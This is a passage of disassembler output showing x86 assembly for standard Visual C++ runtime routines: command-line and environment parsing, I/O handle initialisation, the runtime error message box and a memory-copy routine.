loc_40476C: ; CODE XREF: sub_404644+11E�j
mov eax, [ebp+arg_0]
mov dword_409AFC, eax
loc_404774: ; CODE XREF: sub_404644+34�j
or eax, 0FFFFFFFFh
jmp short loc_404782
; ---------------------------------------------------------------------------
loc_404779: ; CODE XREF: sub_404644+F�j
; sub_404644+1A�j
push [ebp+arg_4]
call dword_4080B4
loc_404782: ; CODE XREF: sub_404644+2C�j
; sub_404644+133�j
pop ebx
pop ebp
retn
sub_404644 endp
; =============== S U B R O U T I N E =======================================
sub_404785 proc near ; CODE XREF: sub_404644+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_4093A0
cmp dword_409320, edx
push esi
mov eax, offset dword_409320
jz short loc_4047B2
lea esi, [ecx+ecx*2]
lea esi, ds:409320h[esi*4]
loc_4047A7: ; CODE XREF: sub_404785+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_4047B2
cmp [eax], edx
jnz short loc_4047A7
loc_4047B2: ; CODE XREF: sub_404785+16�j
; sub_404785+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:409320h[ecx*4]
cmp eax, ecx
jnb short loc_4047C5
cmp [eax], edx
jz short locret_4047C7
loc_4047C5: ; CODE XREF: sub_404785+3A�j
xor eax, eax
locret_4047C7: ; CODE XREF: sub_404785+3E�j
retn
sub_404785 endp
; =============== S U B R O U T I N E =======================================
sub_4047C8 proc near ; CODE XREF: .data:00402F85�p
cmp dword_518628, 0
jnz short loc_4047D6
call sub_4062B4
loc_4047D6: ; CODE XREF: sub_4047C8+7�j
push esi
mov esi, dword_518620
mov al, [esi]
cmp al, 22h
jnz short loc_404808
loc_4047E3: ; CODE XREF: sub_4047C8+33�j
; sub_4047C8+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_404800
test al, al
jz short loc_404800
movzx eax, al
push eax
call sub_405EAE
test eax, eax
pop ecx
jz short loc_4047E3
inc esi
jmp short loc_4047E3
; ---------------------------------------------------------------------------
loc_404800: ; CODE XREF: sub_4047C8+21�j
; sub_4047C8+25�j
cmp byte ptr [esi], 22h
jnz short loc_404812
loc_404805: ; CODE XREF: sub_4047C8+52�j
inc esi
jmp short loc_404812
; ---------------------------------------------------------------------------
loc_404808: ; CODE XREF: sub_4047C8+19�j
cmp al, 20h
jbe short loc_404812
loc_40480C: ; CODE XREF: sub_4047C8+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_40480C
loc_404812: ; CODE XREF: sub_4047C8+3B�j
; sub_4047C8+3E�j ...
mov al, [esi]
test al, al
jz short loc_40481C
cmp al, 20h
jbe short loc_404805
loc_40481C: ; CODE XREF: sub_4047C8+4E�j
mov eax, esi
pop esi
retn
sub_4047C8 endp
; =============== S U B R O U T I N E =======================================
sub_404820 proc near ; CODE XREF: .data:00402F6E�p
push ebx
xor ebx, ebx
cmp dword_518628, ebx
push esi
push edi
jnz short loc_404832
call sub_4062B4
loc_404832: ; CODE XREF: sub_404820+B�j
mov esi, dword_409AE8
xor edi, edi
loc_40483A: ; CODE XREF: sub_404820+30�j
mov al, [esi]
cmp al, bl
jz short loc_404852
cmp al, 3Dh
jz short loc_404845
inc edi
loc_404845: ; CODE XREF: sub_404820+22�j
push esi
call sub_405B90
pop ecx
lea esi, [esi+eax+1]
jmp short loc_40483A
; ---------------------------------------------------------------------------
loc_404852: ; CODE XREF: sub_404820+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_4028C6
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_409AA8, esi
jnz short loc_404874
push 9
call sub_402FD6
pop ecx
loc_404874: ; CODE XREF: sub_404820+4A�j
mov edi, dword_409AE8
cmp [edi], bl
jz short loc_4048B7
push ebp
loc_40487F: ; CODE XREF: sub_404820+94�j
push edi
call sub_405B90
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_4048B0
push ebp
call sub_4028C6
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_4048A3
push 9
call sub_402FD6
pop ecx
loc_4048A3: ; CODE XREF: sub_404820+79�j
push edi
push dword ptr [esi]
call sub_4062D0
pop ecx
add esi, 4
pop ecx
loc_4048B0: ; CODE XREF: sub_404820+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_40487F
pop ebp
loc_4048B7: ; CODE XREF: sub_404820+5C�j
push dword_409AE8
call sub_402B18
pop ecx
mov dword_409AE8, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_518624, 1
pop ebx
retn
sub_404820 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048D9 proc near ; CODE XREF: .data:00402F69�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_518628, ebx
push esi
push edi
jnz short loc_4048F0
call sub_4062B4
loc_4048F0: ; CODE XREF: sub_4048D9+10�j
mov esi, offset dword_409B00
push 104h
push esi
push ebx
call dword_408054
mov eax, dword_518620
mov dword_409AB8, esi
mov edi, esi
cmp [eax], bl
jz short loc_404915
mov edi, eax
loc_404915: ; CODE XREF: sub_4048D9+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_404972
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_4028C6
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_404945
push 8
call sub_402FD6
pop ecx
loc_404945: ; CODE XREF: sub_4048D9+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_404972
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_409AA0, esi
pop edi
pop esi
mov dword_409A9C, eax
pop ebx
leave
retn
sub_4048D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404972 proc near ; CODE XREF: sub_4048D9+47�p
; sub_4048D9+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_40499C
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_40499C: ; CODE XREF: sub_404972+20�j
cmp byte ptr [eax], 22h
jnz short loc_4049E5
loc_4049A1: ; CODE XREF: sub_404972+58�j
; sub_404972+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_4049D3
test dl, dl
jz short loc_4049D3
movzx edx, dl
test byte_5173C1[edx], 4
jz short loc_4049C6
inc dword ptr [ecx]
test esi, esi
jz short loc_4049C6
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_4049C6: ; CODE XREF: sub_404972+46�j
; sub_404972+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_4049A1
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_4049A1
; ---------------------------------------------------------------------------
loc_4049D3: ; CODE XREF: sub_404972+36�j
; sub_404972+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_4049DD
and byte ptr [esi], 0
inc esi
loc_4049DD: ; CODE XREF: sub_404972+65�j
cmp byte ptr [eax], 22h
jnz short loc_404A28
inc eax
jmp short loc_404A28
; ---------------------------------------------------------------------------
loc_4049E5: ; CODE XREF: sub_404972+2D�j
; sub_404972+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_4049F0
mov dl, [eax]
mov [esi], dl
inc esi
loc_4049F0: ; CODE XREF: sub_404972+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_5173C1[ebx], 4
jz short loc_404A0B
inc dword ptr [ecx]
test esi, esi
jz short loc_404A0A
mov bl, [eax]
mov [esi], bl
inc esi
loc_404A0A: ; CODE XREF: sub_404972+91�j
inc eax
loc_404A0B: ; CODE XREF: sub_404972+8B�j
cmp dl, 20h
jz short loc_404A19
test dl, dl
jz short loc_404A1D
cmp dl, 9
jnz short loc_4049E5
loc_404A19: ; CODE XREF: sub_404972+9C�j
test dl, dl
jnz short loc_404A20
loc_404A1D: ; CODE XREF: sub_404972+A0�j
dec eax
jmp short loc_404A28
; ---------------------------------------------------------------------------
loc_404A20: ; CODE XREF: sub_404972+A9�j
test esi, esi
jz short loc_404A28
and byte ptr [esi-1], 0
loc_404A28: ; CODE XREF: sub_404972+6E�j
; sub_404972+71�j ...
and [ebp+arg_10], 0
loc_404A2C: ; CODE XREF: sub_404972+19E�j
cmp byte ptr [eax], 0
jz loc_404B15
loc_404A35: ; CODE XREF: sub_404972+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_404A41
cmp dl, 9
jnz short loc_404A44
loc_404A41: ; CODE XREF: sub_404972+C8�j
inc eax
jmp short loc_404A35
; ---------------------------------------------------------------------------
loc_404A44: ; CODE XREF: sub_404972+CD�j
cmp byte ptr [eax], 0
jz loc_404B15
test edi, edi
jz short loc_404A59
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_404A59: ; CODE XREF: sub_404972+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_404A5E: ; CODE XREF: sub_404972+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_404A67: ; CODE XREF: sub_404972+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_404A70
inc eax
inc ebx
jmp short loc_404A67
; ---------------------------------------------------------------------------
loc_404A70: ; CODE XREF: sub_404972+F8�j
cmp byte ptr [eax], 22h
jnz short loc_404AA1
test bl, 1
jnz short loc_404A9F
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_404A8E
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_404A8E
mov eax, edx
jmp short loc_404A91
; ---------------------------------------------------------------------------
loc_404A8E: ; CODE XREF: sub_404972+10D�j
; sub_404972+116�j
mov [ebp+arg_0], edi
loc_404A91: ; CODE XREF: sub_404972+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_404A9F: ; CODE XREF: sub_404972+106�j
shr ebx, 1
loc_404AA1: ; CODE XREF: sub_404972+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_404AB6
inc ebx
loc_404AA9: ; CODE XREF: sub_404972+142�j
test esi, esi
jz short loc_404AB1
mov byte ptr [esi], 5Ch
inc esi
loc_404AB1: ; CODE XREF: sub_404972+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_404AA9
loc_404AB6: ; CODE XREF: sub_404972+134�j
mov dl, [eax]
test dl, dl
jz short loc_404B06
cmp [ebp+arg_10], 0
jnz short loc_404ACC
cmp dl, 20h
jz short loc_404B06
cmp dl, 9
jz short loc_404B06
loc_404ACC: ; CODE XREF: sub_404972+14E�j
cmp [ebp+arg_0], 0
jz short loc_404B00
test esi, esi
jz short loc_404AEF
movzx ebx, dl
test byte_5173C1[ebx], 4
jz short loc_404AE8
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_404AE8: ; CODE XREF: sub_404972+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_404AFE
; ---------------------------------------------------------------------------
loc_404AEF: ; CODE XREF: sub_404972+162�j
movzx edx, dl
test byte_5173C1[edx], 4
jz short loc_404AFE
inc eax
inc dword ptr [ecx]
loc_404AFE: ; CODE XREF: sub_404972+17B�j
; sub_404972+187�j
inc dword ptr [ecx]
loc_404B00: ; CODE XREF: sub_404972+15E�j
inc eax
jmp loc_404A5E
; ---------------------------------------------------------------------------
loc_404B06: ; CODE XREF: sub_404972+148�j
; sub_404972+153�j ...
test esi, esi
jz short loc_404B0E
and byte ptr [esi], 0
inc esi
loc_404B0E: ; CODE XREF: sub_404972+196�j
inc dword ptr [ecx]
jmp loc_404A2C
; ---------------------------------------------------------------------------
loc_404B15: ; CODE XREF: sub_404972+BD�j
; sub_404972+D5�j
test edi, edi
jz short loc_404B1C
and dword ptr [edi], 0
loc_404B1C: ; CODE XREF: sub_404972+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_404972 endp
; =============== S U B R O U T I N E =======================================
sub_404B26 proc near ; CODE XREF: .data:00402F5F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_409C04
push ebx
push ebp
mov ebp, dword_4080C8
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_404B74
call ebp
mov esi, eax
cmp esi, ebx
jz short loc_404B55
mov dword_409C04, 1
jmp short loc_404B7D
; ---------------------------------------------------------------------------
loc_404B55: ; CODE XREF: sub_404B26+21�j
call dword_4080C4
mov edi, eax
cmp edi, ebx
jz loc_404C4F
mov dword_409C04, 2
jmp loc_404C03
; ---------------------------------------------------------------------------
loc_404B74: ; CODE XREF: sub_404B26+19�j
cmp eax, 1
jnz loc_404BFE
loc_404B7D: ; CODE XREF: sub_404B26+2D�j
cmp esi, ebx
jnz short loc_404B8D
call ebp
mov esi, eax
cmp esi, ebx
jz loc_404C4F
loc_404B8D: ; CODE XREF: sub_404B26+59�j
cmp [esi], bx
mov eax, esi
jz short loc_404BA2
loc_404B94: ; CODE XREF: sub_404B26+73�j
; sub_404B26+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_404B94
inc eax
inc eax
cmp [eax], bx
jnz short loc_404B94
loc_404BA2: ; CODE XREF: sub_404B26+6C�j
sub eax, esi
mov edi, dword_4080C0
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi
mov ebp, eax
cmp ebp, ebx
jz short loc_404BF3
push ebp
call sub_4028C6
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_404BF3
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi
test eax, eax
jnz short loc_404BEF
push [esp+18h+var_8]
call sub_402B18
pop ecx
mov [esp+18h+var_8], ebx
loc_404BEF: ; CODE XREF: sub_404B26+B9�j
mov ebx, [esp+18h+var_8]
loc_404BF3: ; CODE XREF: sub_404B26+99�j
; sub_404B26+A8�j
push esi
call dword_4080BC
mov eax, ebx
jmp short loc_404C51
; ---------------------------------------------------------------------------
loc_404BFE: ; CODE XREF: sub_404B26+51�j
cmp eax, 2
jnz short loc_404C4F
loc_404C03: ; CODE XREF: sub_404B26+49�j
cmp edi, ebx
jnz short loc_404C13
call dword_4080C4
mov edi, eax
cmp edi, ebx
jz short loc_404C4F
loc_404C13: ; CODE XREF: sub_404B26+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_404C23
loc_404C19: ; CODE XREF: sub_404B26+F6�j
; sub_404B26+FB�j
inc eax
cmp [eax], bl
jnz short loc_404C19
inc eax
cmp [eax], bl
jnz short loc_404C19
loc_404C23: ; CODE XREF: sub_404B26+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_4028C6
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_404C39
xor esi, esi
jmp short loc_404C44
; ---------------------------------------------------------------------------
loc_404C39: ; CODE XREF: sub_404B26+10D�j
push ebp
push edi
push esi
call sub_4063C0
add esp, 0Ch
loc_404C44: ; CODE XREF: sub_404B26+111�j
push edi
call dword_4080B8
mov eax, esi
jmp short loc_404C51
; ---------------------------------------------------------------------------
loc_404C4F: ; CODE XREF: sub_404B26+39�j
; sub_404B26+61�j ...
xor eax, eax
loc_404C51: ; CODE XREF: sub_404B26+D6�j
; sub_404B26+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_404B26 endp
; =============== S U B R O U T I N E =======================================
sub_404C58 proc near ; CODE XREF: .data:00402F4F�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_4028C6
mov esi, eax
pop ecx
test esi, esi
jnz short loc_404C78
push 1Bh
call sub_402FD6
pop ecx
loc_404C78: ; CODE XREF: sub_404C58+16�j
mov dword_518500, esi
mov dword_518600, 20h
lea eax, [esi+100h]
loc_404C8E: ; CODE XREF: sub_404C58+52�j
cmp esi, eax
jnb short loc_404CAC
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_518500
add esi, 8
add eax, 100h
jmp short loc_404C8E
; ---------------------------------------------------------------------------
loc_404CAC: ; CODE XREF: sub_404C58+38�j
lea eax, [esp+54h+var_44]
push eax
call dword_408094
cmp word ptr [esp+54h+var_14+2], 0
jz loc_404D88
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_404D88
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_404CE2
mov esi, eax
loc_404CE2: ; CODE XREF: sub_404C58+86�j
cmp dword_518600, esi
jge short loc_404D3C
mov edi, offset dword_518504
loc_404CEF: ; CODE XREF: sub_404C58+DA�j
push 100h
call sub_4028C6
test eax, eax
pop ecx
jz short loc_404D36
add dword_518600, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_404D0D: ; CODE XREF: sub_404C58+CF�j
cmp eax, ecx
jnb short loc_404D29
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_404D0D
; ---------------------------------------------------------------------------
loc_404D29: ; CODE XREF: sub_404C58+B7�j
add edi, 4
cmp dword_518600, esi
jl short loc_404CEF
jmp short loc_404D3C
; ---------------------------------------------------------------------------
loc_404D36: ; CODE XREF: sub_404C58+A4�j
mov esi, dword_518600
loc_404D3C: ; CODE XREF: sub_404C58+90�j
; sub_404C58+DC�j
xor edi, edi
test esi, esi
jle short loc_404D88
loc_404D42: ; CODE XREF: sub_404C58+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_404D7F
mov cl, [ebp+0]
test cl, 1
jz short loc_404D7F
test cl, 8
jnz short loc_404D61
push eax
call dword_4080D4
test eax, eax
jz short loc_404D7F
loc_404D61: ; CODE XREF: sub_404C58+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_518500[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_404D7F: ; CODE XREF: sub_404C58+EF�j
; sub_404C58+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_404D42
loc_404D88: ; CODE XREF: sub_404C58+65�j
; sub_404C58+71�j ...
xor ebx, ebx
loc_404D8A: ; CODE XREF: sub_404C58+195�j
mov eax, dword_518500
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_404DE5
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_404DA5
push 0FFFFFFF6h
pop eax
jmp short loc_404DAF
; ---------------------------------------------------------------------------
loc_404DA5: ; CODE XREF: sub_404C58+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_404DAF: ; CODE XREF: sub_404C58+14B�j
push eax
call dword_4080D0
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_404DD4
push edi
call dword_4080D4
test eax, eax
jz short loc_404DD4
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_404DDA
loc_404DD4: ; CODE XREF: sub_404C58+163�j
; sub_404C58+16E�j
or byte ptr [esi+4], 40h
jmp short loc_404DE9
; ---------------------------------------------------------------------------
loc_404DDA: ; CODE XREF: sub_404C58+17A�j
cmp eax, 3
jnz short loc_404DE9
or byte ptr [esi+4], 8
jmp short loc_404DE9
; ---------------------------------------------------------------------------
loc_404DE5: ; CODE XREF: sub_404C58+13E�j
or byte ptr [esi+4], 80h
loc_404DE9: ; CODE XREF: sub_404C58+180�j
; sub_404C58+185�j ...
inc ebx
cmp ebx, 3
jl short loc_404D8A
push dword_518600
call dword_4080CC
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_404C58 endp
; =============== S U B R O U T I N E =======================================
sub_404E03 proc near ; CODE XREF: sub_402FD6+9�p
; sub_402FFB+9�p
mov eax, dword_409AF0
cmp eax, 1
jz short loc_404E1A
test eax, eax
jnz short locret_404E3B
cmp dword_4090F4, 1
jnz short locret_404E3B
loc_404E1A: ; CODE XREF: sub_404E03+8�j
push 0FCh
call sub_404E3C
mov eax, dword_409C08
pop ecx
test eax, eax
jz short loc_404E30
call eax
loc_404E30: ; CODE XREF: sub_404E03+29�j
push 0FFh
call sub_404E3C
pop ecx
locret_404E3B: ; CODE XREF: sub_404E03+C�j
; sub_404E03+15�j
retn
sub_404E03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E3C proc near ; CODE XREF: sub_402FD6+12�p
; sub_402FFB+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_4093B0
loc_404E4F: ; CODE XREF: sub_404E3C+20�j
cmp edx, [eax]
jz short loc_404E5E
add eax, 8
inc ecx
cmp eax, offset dword_409440
jl short loc_404E4F
loc_404E5E: ; CODE XREF: sub_404E3C+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_4093B0[esi]
jnz loc_404F8C
mov eax, dword_409AF0
cmp eax, 1
jz loc_404F66
test eax, eax
jnz short loc_404E8F
cmp dword_4090F4, 1
jz loc_404F66
loc_404E8F: ; CODE XREF: sub_404E3C+44�j
cmp edx, 0FCh
jz loc_404F8C
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_408054
test eax, eax
jnz short loc_404EC6
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_4062D0
pop ecx
pop ecx
loc_404EC6: ; CODE XREF: sub_404E3C+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_405B90
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_404F09
lea eax, [ebp+var_1A4]
push eax
call sub_405B90
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_406780
add esp, 10h
loc_404F09: ; CODE XREF: sub_404E3C+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_4062D0
lea eax, [ebp+var_A0]
push edi
push eax
call sub_4062E0
lea eax, [ebp+var_A0]
push offset asc_40846C ; "\n\n"
push eax
call sub_4062E0
push off_4093B4[esi]
lea eax, [ebp+var_A0]
push eax
call sub_4062E0
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_4066F5
add esp, 2Ch
pop edi
jmp short loc_404F8C
; ---------------------------------------------------------------------------
loc_404F66: ; CODE XREF: sub_404E3C+3C�j
; sub_404E3C+4D�j
lea eax, [ebp+arg_0]
lea esi, off_4093B4[esi]
push 0
push eax
push dword ptr [esi]
call sub_405B90
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_4080D0
push eax
call dword_408048
loc_404F8C: ; CODE XREF: sub_404E3C+2E�j
; sub_404E3C+59�j ...
pop esi
leave
retn
sub_404E3C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F90 proc near ; CODE XREF: sub_4030DF+2EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00404FCC SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00404FEC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0040508C SIZE 0000004A BYTES
; FUNCTION CHUNK AT 004050E8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004050F0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004050FC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00405110 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00405128 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00405150 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0040515C SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00405267 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00405280 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00405288 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00405298 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004052AC SIZE 00000019 BYTES
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404FB0
cmp edi, eax
jb loc_405128
loc_404FB0: ; CODE XREF: sub_404F90+16�j
test edi, 3
jnz short loc_404FCC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404FEC
rep movsd
jmp off_4050D8[edx*4] ; CODE XREF: start+AB5�p
sub_404F90 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404F90
loc_404FCC: ; CODE XREF: sub_404F90+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_404FE4
and eax, 3
add ecx, eax
jmp dword ptr loc_404FEC+4[eax*4]
; ---------------------------------------------------------------------------
loc_404FE4: ; CODE XREF: sub_404F90+46�j
jmp dword ptr loc_4050E8[ecx*4]
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_404F90
loc_404FEC: ; CODE XREF: sub_404F90+31�j
; .data:0040501E�j ...
jmp off_40506C[ecx*4]
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
db 90h
dd offset loc_405000
dd offset loc_40502C
dd offset loc_405050
; ---------------------------------------------------------------------------
loc_405000: ; DATA XREF: .data:00404FF4�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_404FEC
rep movsd
jmp off_4050D8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40502C: ; DATA XREF: .data:00404FF8�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_404FEC
rep movsd
jmp off_4050D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_405050: ; DATA XREF: .data:00404FFC�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_404FEC
rep movsd
jmp off_4050D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40506C dd offset loc_4050CF ; DATA XREF: sub_404F90:loc_404FEC�r
dd offset loc_4050BC
dd offset loc_4050B4
dd offset loc_4050AC
dd offset loc_4050A4
dd offset loc_40509C
dd offset loc_405094
dd offset loc_40508C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404F90
loc_40508C: ; CODE XREF: sub_404F90:loc_404FEC�j
; DATA XREF: .data:00405088�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_405094: ; CODE XREF: sub_404F90:loc_404FEC�j
; DATA XREF: .data:00405084�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40509C: ; CODE XREF: sub_404F90:loc_404FEC�j
; DATA XREF: .data:00405080�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4050A4: ; CODE XREF: sub_404F90:loc_404FEC�j
; DATA XREF: .data:0040507C�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4050AC: ; CODE XREF: sub_404F90:loc_404FEC�j
; DATA XREF: .data:00405078�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4050B4: ; CODE XREF: sub_404F90:loc_404FEC�j
; DATA XREF: .data:00405074�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4050BC: ; CODE XREF: sub_404F90:loc_404FEC�j
; DATA XREF: .data:00405070�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4050CF: ; CODE XREF: sub_404F90:loc_404FEC�j
; DATA XREF: .data:off_40506C�o
jmp off_4050D8[edx*4]
; END OF FUNCTION CHUNK FOR sub_404F90
; ---------------------------------------------------------------------------
align 4
off_4050D8 dd offset loc_4050E8 ; DATA XREF: sub_404F90+35�r
; .data:00405022�r ...
dd offset loc_4050F0
dd offset loc_4050FC
dd offset loc_405110
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404F90
loc_4050E8: ; CODE XREF: sub_404F90+35�j
; .data:00405022�j ...
mov eax, [ebp+arg_0]
pop esi
